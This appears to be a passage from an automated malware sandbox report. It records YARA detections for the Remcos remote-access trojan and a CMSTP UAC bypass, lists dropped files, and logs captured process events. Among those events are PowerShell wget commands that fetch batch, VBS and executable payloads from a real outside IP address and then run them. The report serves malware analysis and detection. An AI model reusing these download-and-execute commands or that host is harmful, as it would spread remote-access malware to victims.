                      Source: 21.2.cmd.exe.5633b57.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 23.2.explorer.exe.4dbb757.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 17.2.cmd.exe.54200c8.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 17.2.cmd.exe.54200c8.7.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 17.2.cmd.exe.54200c8.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 27.2.explorer.exe.4ba8a8a.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 0000001C.00000002.3213654065.0000000002F1B000.00000004.00000001.01000000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000019.00000002.3213353580.0000000005BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 0000001B.00000002.3184641813.00000000029A9000.00000002.00000001.01000000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000015.00000002.3185375853.0000000005C40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000017.00000002.3036285925.0000000002C59000.00000002.00000001.01000000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000011.00000002.3037243948.0000000005420000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: cmd.exe PID: 5476, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: cmd.exe PID: 5900, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: explorer.exe PID: 4016, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: cmd.exe PID: 1488, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: explorer.exe PID: 4256, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: explorer.exe PID: 5972, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: C:\Users\user\AppData\Local\Temp\mdvbfllr, type: DROPPEDMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: C:\Users\user\AppData\Local\Temp\mdvbfllr, type: DROPPEDMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: C:\Users\user\AppData\Local\Temp\mdvbfllr, type: DROPPEDMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\Temp\yigmovm, type: DROPPEDMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: C:\Users\user\AppData\Local\Temp\yigmovm, type: DROPPEDMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: C:\Users\user\AppData\Local\Temp\yigmovm, type: DROPPEDMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\Temp\vqqcre, type: DROPPEDMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: C:\Users\user\AppData\Local\Temp\vqqcre, type: DROPPEDMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: C:\Users\user\AppData\Local\Temp\vqqcre, type: DROPPEDMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\AUGUST.exeJump to dropped file
                      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/ffo.bat -OutFile C:\Users\user\AppData\Roaming/ffo.bat
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/hi.vbs -OutFile C:\Users\user\AppData\Roaming/hi.vbs
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\ffo.bat" "
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/AUGUST.exe
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/ffo.bat -OutFile C:\Users\user\AppData\Roaming/ffo.batJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/hi.vbs -OutFile C:\Users\user\AppData\Roaming/hi.vbsJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\ffo.bat" "Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/AUGUST.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 20_2_6FD10D95 NtdllDefWindowProc_W,20_2_6FD10D95
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 20_2_6FD12932 _memset,NtdllDefWindowProc_W,20_2_6FD12932
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 20_2_6FD0E5F6 NtdllDefWindowProc_W,CallWindowProcW,20_2_6FD0E5F6
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\lnfast_x64.jobJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeCode function: 14_2_00404FAA14_2_00404FAA
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeCode function: 14_2_0041206B14_2_0041206B
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeCode function: 14_2_0041022D14_2_0041022D
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeCode function: 14_2_00411F9114_2_00411F91
                      Source: C:\Users\user\DZIPR.exeCode function: 15_2_6FA65E7015_2_6FA65E70
                      Source: C:\Users\user\DZIPR.exeCode function: 15_2_6FA663F015_2_6FA663F0
                      Source: C:\Users\user\DZIPR.exeCode function: 15_2_6FA75FB715_2_6FA75FB7
                      Source: C:\Users\user\DZIPR.exeCode function: 15_2_6FA83E3B15_2_6FA83E3B
                      Source: C:\Users\user\DZIPR.exeCode function: 15_2_6FA7AE4515_2_6FA7AE45
                      Source: C:\Users\user\DZIPR.exeCode function: 15_2_6FA71D8515_2_6FA71D85
                      Source: C:\Users\user\DZIPR.exeCode function: 15_2_6FA65CA015_2_6FA65CA0
                      Source: C:\Users\user\DZIPR.exeCode function: 15_2_6FA82CBB15_2_6FA82CBB
                      Source: C:\Users\user\DZIPR.exeCode function: 15_2_6FA76C6C15_2_6FA76C6C
                      Source: C:\Users\user\DZIPR.exeCode function: 15_2_6FA8586C15_2_6FA8586C
                      Source: C:\Users\user\DZIPR.exeCode function: 15_2_6FA7686015_2_6FA76860
                      Source: C:\Users\user\DZIPR.exeCode function: 15_2_6FA617D015_2_6FA617D0
                      Source: C:\Users\user\DZIPR.exeCode function: 15_2_6FA6173015_2_6FA61730
                      Source: C:\Users\user\DZIPR.exeCode function: 15_2_6FA6173915_2_6FA61739
                      Source: C:\Users\user\DZIPR.exeCode function: 15_2_6FA8374315_2_6FA83743
                      Source: C:\Users\user\DZIPR.exeCode function: 15_2_6FA7648C15_2_6FA7648C
                      Source: C:\Users\user\DZIPR.exeCode function: 15_2_6FA831FF15_2_6FA831FF
                      Source: C:\Users\user\DZIPR.exeCode function: 15_2_6FA7708C15_2_6FA7708C
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 16_2_6C535E7016_2_6C535E70
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 16_2_6C5363F016_2_6C5363F0
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 16_2_6C546C6C16_2_6C546C6C
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 16_2_6C552CBB16_2_6C552CBB
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 16_2_6C535CA016_2_6C535CA0
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 16_2_6C541D8516_2_6C541D85
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 16_2_6C54AE4516_2_6C54AE45
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 16_2_6C553E3B16_2_6C553E3B
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 16_2_6C545FB716_2_6C545FB7
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 16_2_6C54686016_2_6C546860
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 16_2_6C55586C16_2_6C55586C
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 16_2_6C54648C16_2_6C54648C
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 16_2_6C55374316_2_6C553743
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 16_2_6C53173116_2_6C531731
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 16_2_6C53173016_2_6C531730
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 16_2_6C5317D016_2_6C5317D0
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 16_2_6C54708C16_2_6C54708C
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 16_2_6C5531FF16_2_6C5531FF
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 20_2_6FD05E7020_2_6FD05E70
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 20_2_6FD063F020_2_6FD063F0
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 20_2_6FD15FB720_2_6FD15FB7
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 20_2_6FD1AE4520_2_6FD1AE45
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 20_2_6FD23E3B20_2_6FD23E3B
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 20_2_6FD11D8520_2_6FD11D85
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 20_2_6FD22CBB20_2_6FD22CBB
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 20_2_6FD05CA020_2_6FD05CA0
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 20_2_6FD16C6C20_2_6FD16C6C
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 20_2_6FD1686020_2_6FD16860
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 20_2_6FD2586C20_2_6FD2586C
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 20_2_6FD017D020_2_6FD017D0
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 20_2_6FD2374320_2_6FD23743
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 20_2_6FD0173020_2_6FD01730
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 20_2_6FD0173120_2_6FD01731
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 20_2_6FD1648C20_2_6FD1648C
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 20_2_6FD231FF20_2_6FD231FF
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 20_2_6FD1708C20_2_6FD1708C
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeCode function: String function: 0040243B appears 37 times
                      Source: C:\Users\user\DZIPR.exeCode function: String function: 6FA753BC appears 48 times
                      Source: C:\Users\user\DZIPR.exeCode function: String function: 6FA750C9 appears 66 times
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: String function: 6C5453BC appears 48 times
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: String function: 6FD153BC appears 48 times
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: String function: 6C5450C9 appears 65 times
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: String function: 6FD150C9 appears 65 times
                      Source: 27.2.explorer.exe.4bedb57.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 23.2.explorer.exe.4dbab57.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 25.2.cmd.exe.5ba00c8.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 25.2.cmd.exe.5ba00c8.7.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 25.2.cmd.exe.5ba00c8.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 17.2.cmd.exe.4a65b57.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 25.2.cmd.exe.55cfa8a.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 28.2.explorer.exe.4e79b57.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 17.2.cmd.exe.4a20a8a.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 28.2.explorer.exe.4e34a8a.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 15.2.DZIPR.exe.35b39ce.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 25.2.cmd.exe.5ba00c8.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 25.2.cmd.exe.5ba00c8.7.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 25.2.cmd.exe.5ba00c8.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 23.2.explorer.exe.4d75a8a.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 27.2.explorer.exe.4bee757.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 21.2.cmd.exe.55eea8a.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 15.2.DZIPR.exe.35b45ce.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 17.2.cmd.exe.54200c8.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 17.2.cmd.exe.54200c8.7.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 17.2.cmd.exe.54200c8.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 25.2.cmd.exe.5615757.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 21.2.cmd.exe.5c400c8.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 21.2.cmd.exe.5c400c8.7.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 21.2.cmd.exe.5c400c8.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 21.2.cmd.exe.5634757.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 17.2.cmd.exe.4a66757.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 28.2.explorer.exe.4e7a757.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 25.2.cmd.exe.5614b57.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 15.2.DZIPR.exe.356e901.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 21.2.cmd.exe.5c400c8.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 21.2.cmd.exe.5c400c8.7.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 21.2.cmd.exe.5c400c8.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 21.2.cmd.exe.5633b57.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 23.2.explorer.exe.4dbb757.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 17.2.cmd.exe.54200c8.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 17.2.cmd.exe.54200c8.7.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 17.2.cmd.exe.54200c8.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 27.2.explorer.exe.4ba8a8a.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 0000001C.00000002.3213654065.0000000002F1B000.00000004.00000001.01000000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000019.00000002.3213353580.0000000005BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 0000001B.00000002.3184641813.00000000029A9000.00000002.00000001.01000000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
